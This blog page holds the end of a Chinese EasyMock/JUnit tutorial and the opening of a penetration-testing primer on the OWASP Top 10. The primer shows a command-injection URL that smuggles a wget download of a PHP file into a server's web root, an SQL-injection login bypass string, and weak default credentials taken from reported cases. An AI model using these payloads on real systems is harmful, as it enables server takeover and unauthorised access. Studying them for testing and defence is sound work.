accountant.setPersonalIncomeTax(personalIncomeTax);

}

/**

* @throws java.lang.Exception

*/

@After

public void tearDown() throws Exception {

System.out.println("----------AccountantTest中的全部用例测试完毕---------");

}

@Test

public void testCalculateSalary(){

//个人所得税的计算接口还没实现，但会计师的计算工资的方法已经写好了。需要测试。

//我们可以先Mock一个出来测试。

//个人所得税的计算接口正确的话，传入实际收入8000.00，税前扣除1520.00。应该返回193.00.

expect(personalIncomeTax.calculate(8000.00,1520.00)).andReturn(193.00);

//设置到回放状态

replay(personalIncomeTax);

//验证计算工资方法计算是否正确。

Assert.assertEquals(8000.00-1520.00-193.00, accountant.calculateSalary(8000.00));

verify(personalIncomeTax);

}

4. 执行测试

　　最后是最简单的一步了。右键点击AccountantTest.java，Run As —> JUnit Test。得到下面的成功界面。

　　PS：到上面一步，单元测试已经是完成了。拥有好奇心的你还可以testCalculateSalary()方法里的数值去看看如果单元测试不通过会报什么错。

　　比如，改一下所传的参数personalIncomeTax.calculate(8000.00,1520.00)变为personalIncomeTax.calculate(9000.00,1520.00)。

　　改一下断言什么的，报错又会是什么。Assert.assertEquals(8000.00-1520.00-193.00, accountant.calculateSalary(8000.00));

　　具体的EasyMock文档在网络上已经漫天飞。自己去找找，深入了解下EasyMock。

posted @ 2014-12-22 23:43 顺其自然EVO 阅读(378) | 评论 (0) | 编辑收藏

渗透测试必知必会—Web漏洞

　　0x00前言

　　本文为对WEB漏洞研究系列的开篇，日后会针对这些漏洞一一研究，敬请期待

　　0x01 目录

　　0x00 前言

　　0x01 目录

　　0x02 OWASP TOP10 简单介绍

　　0x03 乌云TOP 10 简单介绍

　　0x04 非主流的WEB漏洞

　　0x02 OWASP TOP10 简单介绍

　　除了OWASP的TOP10，Web安全漏洞还有很多很多，在做测试和加固系统时也不能老盯着TOP10，实际上是TOP10中的那少数几个

　　直接说2013的：

　　A1: 注入，包括SQL注入、OS注入、LDAP注入。SQL注入最常见，wooyun.org || http://packetstormsecurity.com 搜SQL注入有非常多的案例，由于现在自动化工具非常多，通常都是找到注入点后直接交给以sqlmap为代表的工具

　　命令注入相对来说出现得较少，形式可以是：

　　https://1XX.202.234.22/debug/list_logfile.php?action=restartservice&bash=;wget -O /Isc/third-party/httpd/htdocs/index_bak.php http://xxphp.txt;

　　也可以查看案例：极路由云插件安装shell命令注入漏洞，未对用户输入做任何校验，因此在web端ssh密码填写处输入一条命令`dropbear`便得到了执行

　　直接搜索LDAP注入案例，简单尝试下并没有找到，关于LDAP注入的相关知识可以参考我整理的LDAP注入与防御解析。虽然没有搜到LDAP注入的案例，但是重要的LDAP信息泄露还是挺多的，截至目前，乌云上搜关键词LDAP有81条记录。

　　PHP对象注入：偶然看到有PHP对象注入这种漏洞，OWASP上对其的解释为：依赖于上下文的应用层漏洞，可以让攻击者实施多种恶意攻击，如代码注入、SQL注入、路径遍历及拒绝服务。实现对象注入的条件为：1) 应用程序必须有一个实现PHP魔术方法(如 __wakeup或 __destruct)的类用于执行恶意攻击，或开始一个"POP chain"；2) 攻击中用到的类在有漏洞的unserialize()被调用时必须已被声明，或者自动加载的对象必须被这些类支持。PHP对象注入的案例及文章可以参考WordPress < 3.6.1 PHP 对象注入漏洞。

　　在查找资料时，看到了PHP 依赖注入，原本以为是和安全相关的，结果发现：依赖注入是对于要求更易维护，更易测试，更加模块化的代码的解决方案。果然不同的视角，对同一个词的理解相差挺多的。

　　A2: 失效的身份认证及会话管理，乍看身份认证觉得是和输入密码有关的，实际上还有会话id泄露等情况，注意力集中在口令安全上：

　　案例1：空口令

　　乌云：国内cisco系列交换机空密码登入大集合

　　乌云：UC某服务器可空口令访问数据库

　　案例2：弱口令

　　乌云：盛大某站后台存在简单弱口令可登录　　admin/admin

　　乌云：电信某省客服系统弱口令泄漏各种信息　.../123456

　　乌云：中国建筑股份有限公司OA系统tomcat弱口令导致沦陷　　tomcat/tomcat

　　案例3：万能密码

　　乌云：移动号码上户系统存在过滤不严　　admin'OR'a'='a/admin'OR'a'='a (实际上仍属于SQL注入)

　　弱口令案例实在不一而足